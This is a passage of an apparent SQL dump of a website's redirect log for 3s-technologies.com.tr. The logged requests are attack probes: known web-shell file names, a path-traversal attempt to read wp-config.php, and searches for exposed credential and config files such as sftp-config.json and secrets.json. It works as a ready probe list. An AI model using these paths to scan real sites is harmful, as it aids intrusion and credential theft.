00:00:00',301),(43334,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://www.youtube.com/','',4,0,'2025-07-23 13:31:47','0000-00-00 00:00:00',301),(43335,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://www.facebook.com/','',2,0,'2025-07-23 13:31:49','0000-00-00 00:00:00',301),(43336,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://www.youtube.com/','',2,0,'2025-07-23 13:31:51','0000-00-00 00:00:00',301),(43337,'https://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://www.bing.com/','',2,0,'2025-07-23 13:42:32','0000-00-00 00:00:00',301),(43338,'https://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://www.facebook.com/','',1,0,'2025-07-23 13:42:36','0000-00-00 00:00:00',301),(43339,'https://3s-technologies.com.tr/tr/wp/wp-content/plugins/wp-automatic/logs/log.txt',NULL,'https://duckduckgo.com/','',1,0,'2025-07-23 13:42:38','0000-00-00 00:00:00',301),(43340,'http://3s-technologies.com.tr/tr/modules-mod-simplefileuploadv1-3-elements-filemanager-php',NULL,'','',1,0,'2025-07-23 17:50:02','0000-00-00 00:00:00',301),(43341,'http://3s-technologies.com.tr/tr/wp-content/plugins/xt/php',NULL,'','',2,0,'2025-07-23 23:12:54','0000-00-00 00:00:00',301),(43342,'http://3s-technologies.com.tr/tr/wp-admin/maint/php',NULL,'','',4,0,'2025-07-23 23:13:07','0000-00-00 00:00:00',301),(43343,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2025-07-24 02:52:10','0000-00-00 00:00:00',301),(43344,'http://3s-technologies.com.tr/tr/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2025-07-24 03:07:00','0000-00-00 00:00:00',301),(43345,'http://3s-technologies.com.tr/tr/about.php/wp-includes/text/network.php',NULL,'','',2,0,'2025-07-24 11:12:14','0000-00-00 00:00:00',301),(43346,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/lock.php/wp-admin/user/admin.php/wp-content/uploads/json.php',NULL,'','',2,0,'2025-07-24 11:12:16','0000-00-00 00:00:00',301),(43347,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/plugins.php/wp-includes/certificates/plugins.php',NULL,'','',2,0,'2025-07-24 11:12:18','0000-00-00 00:00:00',301),(43348,'http://3s-technologies.com.tr/tr/admin/function.php/.well-known/pki-validation/xmrlpc.php',NULL,'','',2,0,'2025-07-24 11:12:32','0000-00-00 00:00:00',301),(43349,'http://3s-technologies.com.tr/tr/assets/images/images.php',NULL,'','',4,0,'2025-07-24 18:22:11','0000-00-00 00:00:00',301),(43350,'http://3s-technologies.com.tr/tr/wp-includes/customize/plugins.php/wp-includes/certificates/plugins.php',NULL,'','',1,0,'2025-07-24 21:55:06','0000-00-00 00:00:00',301),(43351,'http://3s-technologies.com.tr/tr/autoload_classmap.phphttps:/ranchimprovements.com/byp.php',NULL,'','',1,0,'2025-07-24 21:55:08','0000-00-00 00:00:00',301),(43352,'http://3s-technologies.com.tr/tr/item.php/admin.php',NULL,'','',10,0,'2025-07-24 21:55:20','0000-00-00 00:00:00',301),(43353,'http://3s-technologies.com.tr/tr/wp-content/upgrade/index.phphttps:/avocadorentals.com/wp-includes/style-engine/about.php',NULL,'','',1,0,'2025-07-24 21:55:36','0000-00-00 00:00:00',301),(43354,'http://3s-technologies.com.tr/tr/f5.php',NULL,'','',34,0,'2025-07-24 21:55:39','0000-00-00 00:00:00',301),(43355,'http://3s-technologies.com.tr/tr/inputs.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-24 21:55:40','0000-00-00 00:00:00',301),(43356,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../wp-config.php',NULL,'','',2,0,'2025-07-25 04:26:04','0000-00-00 00:00:00',301),(43357,'https://3s-technologies.com.tr/tr/.vscode/ftp.json',NULL,'','',1,0,'2025-07-25 06:13:56','0000-00-00 00:00:00',301),(43358,'https://3s-technologies.com.tr/tr/.vscode/ftp-config.json',NULL,'','',1,0,'2025-07-25 06:13:57','0000-00-00 00:00:00',301),(43359,'https://3s-technologies.com.tr/tr/.vscode/sftp-config.json',NULL,'','',1,0,'2025-07-25 06:13:57','0000-00-00 00:00:00',301),(43360,'http://3s-technologies.com.tr/tr/config.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-25 18:57:10','0000-00-00 00:00:00',301),(43361,'http://3s-technologies.com.tr/tr/admin.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-25 18:57:11','0000-00-00 00:00:00',301),(43362,'http://3s-technologies.com.tr/tr/about.phprumusanjavatis.com',NULL,'','',1,0,'2025-07-25 18:57:14','0000-00-00 00:00:00',301),(43363,'http://3s-technologies.com.tr/tr/wp-includes/html-api/admin.php',NULL,'','',1,0,'2025-07-25 18:57:15','0000-00-00 00:00:00',301),(43364,'http://3s-technologies.com.tr/tr/manager.php/js/fm.php',NULL,'','',1,0,'2025-07-25 18:57:23','0000-00-00 00:00:00',301),(43365,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php/install.php/wp-content/uploads/json.php',NULL,'','',1,0,'2025-07-25 18:57:42','0000-00-00 00:00:00',301),(43366,'http://3s-technologies.com.tr/tr/lock6.php',NULL,'','',8,0,'2025-07-26 03:16:04','0000-00-00 00:00:00',301),(43367,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php/wp-admin/user/admin.php/.well-known/pki-validation/xmrlpc.php',NULL,'','',1,0,'2025-07-26 03:16:25','0000-00-00 00:00:00',301),(43368,'http://3s-technologies.com.tr/tr/wp-includes/id3/autoload_classmap.phphttp:/artrael.com/about/function.php',NULL,'','',1,0,'2025-07-26 03:16:28','0000-00-00 00:00:00',301),(43369,'http://3s-technologies.com.tr/tr/wp-admin/ben.php',NULL,'','',1,0,'2025-07-26 03:16:30','0000-00-00 00:00:00',301),(43370,'http://3s-technologies.com.tr/tr/admin/function.php/install.php',NULL,'','',3,0,'2025-07-26 03:16:38','0000-00-00 00:00:00',301),(43371,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/certificates/plugins.php',NULL,'','',1,0,'2025-07-26 03:16:42','0000-00-00 00:00:00',301),(43372,'http://3s-technologies.com.tr/tr/function/admin.php',NULL,'','',6,0,'2025-07-26 03:31:31','0000-00-00 00:00:00',301),(43373,'http://3s-technologies.com.tr/tr/wp-includes/blocks/chosen.php',NULL,'','',9,0,'2025-07-26 03:31:54','0000-00-00 00:00:00',301),(43374,'http://3s-technologies.com.tr/tr/wp-admin/doc.php',NULL,'','',8,0,'2025-07-26 03:32:04','0000-00-00 00:00:00',301),(43375,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/install.php',NULL,'','',4,0,'2025-07-26 03:32:14','0000-00-00 00:00:00',301),(43376,'http://3s-technologies.com.tr/tr/images/marvins.php',NULL,'','',18,0,'2025-07-26 03:32:18','0000-00-00 00:00:00',301),(43377,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/wp-login.php',NULL,'','',5,0,'2025-07-26 03:32:20','0000-00-00 00:00:00',301),(43378,'http://3s-technologies.com.tr/tr/uploads/admin.php',NULL,'','',8,0,'2025-07-26 03:32:25','0000-00-00 00:00:00',301),(43379,'http://3s-technologies.com.tr/tr/wp-content/languages/ty.php',NULL,'','',8,0,'2025-07-26 03:32:35','0000-00-00 00:00:00',301),(43380,'http://3s-technologies.com.tr/tr/wp-includes/manager.php',NULL,'','',4,0,'2025-07-26 03:32:46','0000-00-00 00:00:00',301),(43381,'http://3s-technologies.com.tr/tr/wp-includes/ixr/wp-conflg.php',NULL,'','',7,0,'2025-07-26 03:32:48','0000-00-00 00:00:00',301),(43382,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/wp-2019.php',NULL,'','',1,0,'2025-07-26 03:32:52','0000-00-00 00:00:00',301),(43383,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/makeasmtp.php',NULL,'','',7,0,'2025-07-26 03:32:54','0000-00-00 00:00:00',301),(43384,'http://3s-technologies.com.tr/tr/admin/upload/css.phphmgm.ir',NULL,'','',1,0,'2025-07-26 06:52:39','0000-00-00 00:00:00',301),(43385,'http://3s-technologies.com.tr/tr/bs2.php',NULL,'','',13,0,'2025-07-26 06:52:51','0000-00-00 00:00:00',301),(43386,'http://3s-technologies.com.tr/tr/cong.phphttps:/protectthekids-co.fireyourpestcompany.com/wp-includes/text/about.php',NULL,'','',1,0,'2025-07-26 06:52:55','0000-00-00 00:00:00',301),(43387,'http://3s-technologies.com.tr/tr/about.phphttp:/www.copperjungle.marketsaurus.com/wp-admin/images/index.php',NULL,'','',1,0,'2025-07-26 06:53:00','0000-00-00 00:00:00',301),(43388,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwelve/css/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:14','0000-00-00 00:00:00',301),(43389,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:15','0000-00-00 00:00:00',301),(43390,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/format-library/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:15','0000-00-00 00:00:00',301),(43391,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/alfa-rex.php8',NULL,'','',5,0,'2025-07-26 09:12:16','0000-00-00 00:00:00',301),(43392,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:18','0000-00-00 00:00:00',301),(43393,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/about.php',NULL,'','',2,0,'2025-07-26 09:12:18','0000-00-00 00:00:00',301),(43394,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/about.php',NULL,'','',49,0,'2025-07-26 09:12:19','0000-00-00 00:00:00',301),(43395,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/sass/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:19','0000-00-00 00:00:00',301),(43396,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:20','0000-00-00 00:00:00',301),(43397,'http://3s-technologies.com.tr/tr/wp-content/themes/xss/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:21','0000-00-00 00:00:00',301),(43398,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/alfa-rex.php',NULL,'','',3,0,'2025-07-26 09:12:21','0000-00-00 00:00:00',301),(43399,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:22','0000-00-00 00:00:00',301),(43400,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:23','0000-00-00 00:00:00',301),(43401,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/i18n/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:23','0000-00-00 00:00:00',301),(43402,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/templates/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:24','0000-00-00 00:00:00',301),(43403,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/about.php7',NULL,'','',1,0,'2025-07-26 09:12:26','0000-00-00 00:00:00',301),(43404,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/development/alfa-rex.php8',NULL,'','',4,0,'2025-07-26 09:12:26','0000-00-00 00:00:00',301),(43405,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/inc/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:27','0000-00-00 00:00:00',301),(43406,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:28','0000-00-00 00:00:00',301),(43407,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/js/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:28','0000-00-00 00:00:00',301),(43408,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/sass/about.php',NULL,'','',1,0,'2025-07-26 09:12:29','0000-00-00 00:00:00',301),(43409,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/js/alfa-rex.php',NULL,'','',2,0,'2025-07-26 09:12:29','0000-00-00 00:00:00',301),(43410,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:30','0000-00-00 00:00:00',301),(43411,'http://3s-technologies.com.tr/tr/wp-content/themes/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:30','0000-00-00 00:00:00',301),(43412,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/parts/about.php',NULL,'','',4,0,'2025-07-26 09:12:31','0000-00-00 00:00:00',301),(43413,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:32','0000-00-00 00:00:00',301),(43414,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/classes/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:34','0000-00-00 00:00:00',301),(43415,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:35','0000-00-00 00:00:00',301),(43416,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/styles/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:36','0000-00-00 00:00:00',301),(43417,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse/alfa-rex.php7',NULL,'','',1,0,'2025-07-26 09:12:37','0000-00-00 00:00:00',301),(43418,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/classes/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:37','0000-00-00 00:00:00',301),(43419,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:38','0000-00-00 00:00:00',301),(43420,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:38','0000-00-00 00:00:00',301),(43421,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/images/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:41','0000-00-00 00:00:00',301),(43422,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/wp/about.php',NULL,'','',1,0,'2025-07-26 09:12:41','0000-00-00 00:00:00',301),(43423,'http://3s-technologies.com.tr/tr/wp-admin/includes/alfa-rex.php',NULL,'','',2,0,'2025-07-26 09:12:42','0000-00-00 00:00:00',301),(43424,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/parts/alfa-rex.php8',NULL,'','',4,0,'2025-07-26 09:12:43','0000-00-00 00:00:00',301),(43425,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/template-parts/about.php',NULL,'','',2,0,'2025-07-26 09:12:43','0000-00-00 00:00:00',301),(43426,'http://3s-technologies.com.tr/tr/wp-content/themes/customizr/assets/about.php',NULL,'','',1,0,'2025-07-26 09:12:45','0000-00-00 00:00:00',301),(43427,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/about.php',NULL,'','',1,0,'2025-07-26 09:12:46','0000-00-00 00:00:00',301),(43428,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/parts/about.php',NULL,'','',1,0,'2025-07-26 09:12:46','0000-00-00 00:00:00',301),(43429,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/languages/about.php',NULL,'','',1,0,'2025-07-26 09:12:47','0000-00-00 00:00:00',301),(43430,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/woocustomtemplates/about.php7',NULL,'','',1,0,'2025-07-26 09:12:47','0000-00-00 00:00:00',301),(43431,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/reusable-blocks/about.php',NULL,'','',1,0,'2025-07-26 09:12:48','0000-00-00 00:00:00',301),(43432,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/woocommerce/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:49','0000-00-00 00:00:00',301),(43433,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/wp/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:50','0000-00-00 00:00:00',301),(43434,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/editor/alfa-rex.php',NULL,'','',2,0,'2025-07-26 09:12:51','0000-00-00 00:00:00',301),(43435,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/assets/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:52','0000-00-00 00:00:00',301),(43436,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/alfa-rex.php7',NULL,'','',2,0,'2025-07-26 09:12:52','0000-00-00 00:00:00',301),(43437,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/inc/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:53','0000-00-00 00:00:00',301),(43438,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/wp-login.php',NULL,'','',1,0,'2025-07-26 09:12:54','0000-00-00 00:00:00',301),(43439,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-widgets/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:54','0000-00-00 00:00:00',301),(43440,'http://3s-technologies.com.tr/tr/wp-includes/images/alfa-rex.php8',NULL,'','',2,0,'2025-07-26 09:12:55','0000-00-00 00:00:00',301),(43441,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/about.php7',NULL,'','',2,0,'2025-07-26 09:12:56','0000-00-00 00:00:00',301),(43442,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/about.php7',NULL,'','',1,0,'2025-07-26 09:12:56','0000-00-00 00:00:00',301),(43443,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/alfa-rex.php',NULL,'','',2,0,'2025-07-26 09:12:57','0000-00-00 00:00:00',301),(43444,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-editor/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:12:57','0000-00-00 00:00:00',301),(43445,'http://3s-technologies.com.tr/tr/wp-includes/assets/alfa-rex.php7',NULL,'','',1,0,'2025-07-26 09:12:58','0000-00-00 00:00:00',301),(43446,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfourteen/js/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:12:59','0000-00-00 00:00:00',301),(43447,'http://3s-technologies.com.tr/tr/wp-includes/id3/about.php7',NULL,'','',3,0,'2025-07-26 09:12:59','0000-00-00 00:00:00',301),(43448,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:13:00','0000-00-00 00:00:00',301),(43449,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/js/about.php',NULL,'','',1,0,'2025-07-26 09:13:00','0000-00-00 00:00:00',301),(43450,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/http/about.php7',NULL,'','',1,0,'2025-07-26 09:13:01','0000-00-00 00:00:00',301),(43451,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/template-parts/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:13:02','0000-00-00 00:00:00',301),(43452,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwelve/page-templates/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:13:03','0000-00-00 00:00:00',301),(43453,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/net/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:13:04','0000-00-00 00:00:00',301),(43454,'http://3s-technologies.com.tr/tr/wp-content/themes/travel-lite/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:13:04','0000-00-00 00:00:00',301),(43455,'http://3s-technologies.com.tr/tr/wp-content/themes/tripod/languages/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:13:05','0000-00-00 00:00:00',301),(43456,'http://3s-technologies.com.tr/tr/wp-1ogin.php',NULL,'','',2,0,'2025-07-26 09:13:06','0000-00-00 00:00:00',301),(43457,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/inc/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:13:06','0000-00-00 00:00:00',301),(43458,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/decode/about.php7',NULL,'','',1,0,'2025-07-26 09:13:07','0000-00-00 00:00:00',301),(43459,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/src/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:13:07','0000-00-00 00:00:00',301),(43460,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/about.php7',NULL,'','',1,0,'2025-07-26 09:13:08','0000-00-00 00:00:00',301),(43461,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/net/about.php7',NULL,'','',1,0,'2025-07-26 09:13:09','0000-00-00 00:00:00',301),(43462,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse/wp-login.php',NULL,'','',1,0,'2025-07-26 09:13:09','0000-00-00 00:00:00',301),(43463,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/inc/alfa-rex.php',NULL,'','',1,0,'2025-07-26 09:13:10','0000-00-00 00:00:00',301),(43464,'http://3s-technologies.com.tr/tr/wp-content/themes/vantage/slider/alfa-rex.php8',NULL,'','',1,0,'2025-07-26 09:13:11','0000-00-00 00:00:00',301),(43465,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/alfa-rex.php7',NULL,'','',1,0,'2025-07-26 09:13:11','0000-00-00 00:00:00',301),(43466,'http://3s-technologies.com.tr/tr/wp-includes/blocks/button/ff2.php',NULL,'','',1,0,'2025-07-26 09:53:34','0000-00-00 00:00:00',301),(43467,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/elfindervolumeftp.class.php',NULL,'','',1,0,'2025-07-26 09:53:36','0000-00-00 00:00:00',301),(43468,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-manager-advanced/application/library/php/elfindervolumeftp.class.php',NULL,'','',1,0,'2025-07-26 09:53:37','0000-00-00 00:00:00',301),(43469,'http://3s-technologies.com.tr/tr/amp.php',NULL,'','',26,0,'2025-07-26 09:53:37','0000-00-00 00:00:00',301),(43470,'http://3s-technologies.com.tr/tr/wp-content/wp-conflg.php',NULL,'','',89,0,'2025-07-26 09:53:38','0000-00-00 00:00:00',301),(43471,'http://3s-technologies.com.tr/tr/wp-includes/images/install.php',NULL,'','',1,0,'2025-07-26 09:53:41','0000-00-00 00:00:00',301),(43472,'http://3s-technologies.com.tr/tr/wp-includes/images/orvx-l3b0tq.php',NULL,'','',1,0,'2025-07-26 09:53:42','0000-00-00 00:00:00',301),(43473,'http://3s-technologies.com.tr/tr/wp-includes/images/brand.php',NULL,'','',1,0,'2025-07-26 09:53:42','0000-00-00 00:00:00',301),(43474,'http://3s-technologies.com.tr/tr/wp-includes/images/mah.php',NULL,'','',1,0,'2025-07-26 09:53:44','0000-00-00 00:00:00',301),(43475,'http://3s-technologies.com.tr/tr/wp-includes/images/defaults.php/wp-admin/includes/class-wp-filesystem-base.php',NULL,'','',1,0,'2025-07-26 09:53:45','0000-00-00 00:00:00',301),(43476,'http://3s-technologies.com.tr/tr/core/includes/includes/includes/includes/includes/includes/includes/cache.php',NULL,'','',1,0,'2025-07-26 09:53:48','0000-00-00 00:00:00',301),(43477,'http://3s-technologies.com.tr/tr/core/includes/includes/includes/includes/includes/cache.php',NULL,'','',1,0,'2025-07-26 09:53:49','0000-00-00 00:00:00',301),(43478,'http://3s-technologies.com.tr/tr/core/includes/includes/cache.php',NULL,'','',1,0,'2025-07-26 09:53:50','0000-00-00 00:00:00',301),(43479,'http://3s-technologies.com.tr/tr/wp-content/moon.php',NULL,'','',7,0,'2025-07-26 09:53:51','0000-00-00 00:00:00',301),(43480,'http://3s-technologies.com.tr/tr/v0.php',NULL,'','',1,0,'2025-07-26 09:53:52','0000-00-00 00:00:00',301),(43481,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/chosen.php',NULL,'','',17,0,'2025-07-26 09:53:54','0000-00-00 00:00:00',301),(43482,'http://3s-technologies.com.tr/tr/wp-includes/images/defaults.php',NULL,'','',1,0,'2025-07-26 09:53:55','0000-00-00 00:00:00',301),(43483,'http://3s-technologies.com.tr/tr/wp-content/uploads/index.php/wp-includes/text/network.php',NULL,'','',7,0,'2025-07-26 15:39:42','0000-00-00 00:00:00',301),(43484,'http://3s-technologies.com.tr/tr/ralphwetzel/theonionbox',NULL,'','',4,0,'2025-07-26 15:39:45','0000-00-00 00:00:00',301),(43485,'http://3s-technologies.com.tr/tr/wp-includes/customize/https:/srtbc.com/edit.php',NULL,'','',1,0,'2025-07-26 15:39:49','0000-00-00 00:00:00',301),(43486,'http://3s-technologies.com.tr/tr/moon.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-26 15:39:53','0000-00-00 00:00:00',301),(43487,'http://3s-technologies.com.tr/tr/fm.php/admin.php',NULL,'','',1,0,'2025-07-26 15:40:02','0000-00-00 00:00:00',301),(43488,'http://3s-technologies.com.tr/tr/wp-admin/images/cloud.phphttps:/anngli.com/radio.php',NULL,'','',1,0,'2025-07-26 15:40:05','0000-00-00 00:00:00',301),(43489,'http://3s-technologies.com.tr/tr/index/function.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-26 15:40:06','0000-00-00 00:00:00',301),(43490,'http://3s-technologies.com.tr/tr/admin/function.php/wp-includes/sodium_compat/index.php',NULL,'','',1,0,'2025-07-26 15:40:07','0000-00-00 00:00:00',301),(43491,'http://3s-technologies.com.tr/tr/admin/function.php/wp-content/uploads/json.php',NULL,'','',1,0,'2025-07-26 18:37:26','0000-00-00 00:00:00',301),(43492,'http://3s-technologies.com.tr/tr/wp-content/packed.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-26 18:37:36','0000-00-00 00:00:00',301),(43493,'http://3s-technologies.com.tr/tr/link.php/wp-includes/text/network.php',NULL,'','',1,0,'2025-07-26 18:37:42','0000-00-00 00:00:00',301),(43494,'https://3s-technologies.com.tr/tr/server/_datasources.trash.json',NULL,'','',2,0,'2025-07-26 19:04:18','0000-00-00 00:00:00',301),(43495,'https://3s-technologies.com.tr/tr/web/config/config.systest.json',NULL,'','',2,0,'2025-07-26 19:04:20','0000-00-00 00:00:00',301),(43496,'https://3s-technologies.com.tr/tr/parse-server/mailgun.json',NULL,'','',2,0,'2025-07-26 19:04:21','0000-00-00 00:00:00',301),(43497,'https://3s-technologies.com.tr/tr/config/smtp.json',NULL,'','',2,0,'2025-07-26 19:04:22','0000-00-00 00:00:00',301),(43498,'https://3s-technologies.com.tr/tr/config/default.json',NULL,'','',2,0,'2025-07-26 19:04:23','0000-00-00 00:00:00',301),(43499,'https://3s-technologies.com.tr/tr/env.json',NULL,'','',2,0,'2025-07-26 19:04:24','0000-00-00 00:00:00',301),(43500,'https://3s-technologies.com.tr/tr/appsettings.development.json',NULL,'','',5,0,'2025-07-26 19:04:25','0000-00-00 00:00:00',301),(43501,'https://3s-technologies.com.tr/tr/config/mock.json',NULL,'','',2,0,'2025-07-26 19:04:25','0000-00-00 00:00:00',301),(43502,'https://3s-technologies.com.tr/tr/settings-stage.json',NULL,'','',2,0,'2025-07-26 19:04:26','0000-00-00 00:00:00',301),(43503,'https://3s-technologies.com.tr/tr/app/config/mail.json',NULL,'','',2,0,'2025-07-26 19:04:27','0000-00-00 00:00:00',301),(43504,'https://3s-technologies.com.tr/tr/container/globalcontextdata/local.json',NULL,'','',2,0,'2025-07-26 19:04:27','0000-00-00 00:00:00',301),(43505,'https://3s-technologies.com.tr/tr/config/development.json',NULL,'','',2,0,'2025-07-26 19:04:28','0000-00-00 00:00:00',301),(43506,'https://3s-technologies.com.tr/tr/mailgun.json',NULL,'','',2,0,'2025-07-26 19:04:29','0000-00-00 00:00:00',301),(43507,'https://3s-technologies.com.tr/tr/config/config-prod.json',NULL,'','',2,0,'2025-07-26 19:04:30','0000-00-00 00:00:00',301),(43508,'https://3s-technologies.com.tr/tr/secrets.json',NULL,'','',3,0,'2025-07-26 19:04:31','0000-00-00 00:00:00',301),(43509,'https://3s-technologies.com.tr/tr/kitchen-gui/settings.json',NULL,'','',2,0,'2025-07-26 19:04:32','0000-00-00 00:00:00',301),(43510,'https://3s-technologies.com.tr/tr/appsettings.production.json',NULL,'','',2,0,'2025-07-26 19:04:33','0000-00-00 00:00:00',301),(43511,'https://3s-technologies.com.tr/tr/config/config-dev.json',NULL,'','',2,0,'2025-07-26 19:04:34','0000-00-00 00:00:00',301),(43512,'https://3s-technologies.com.tr/tr/server/config.json',NULL,'','',2,0,'2025-07-26 19:04:34','0000-00-00 00:00:00',301),(43513,'https://3s-technologies.com.tr/tr/server/datasources.json',NULL,'','',2,0,'2025-07-26 19:04:35','0000-00-00 00:00:00',301),(43514,'https://3s-technologies.com.tr/tr/settings.json',NULL,'','',2,0,'2025-07-26 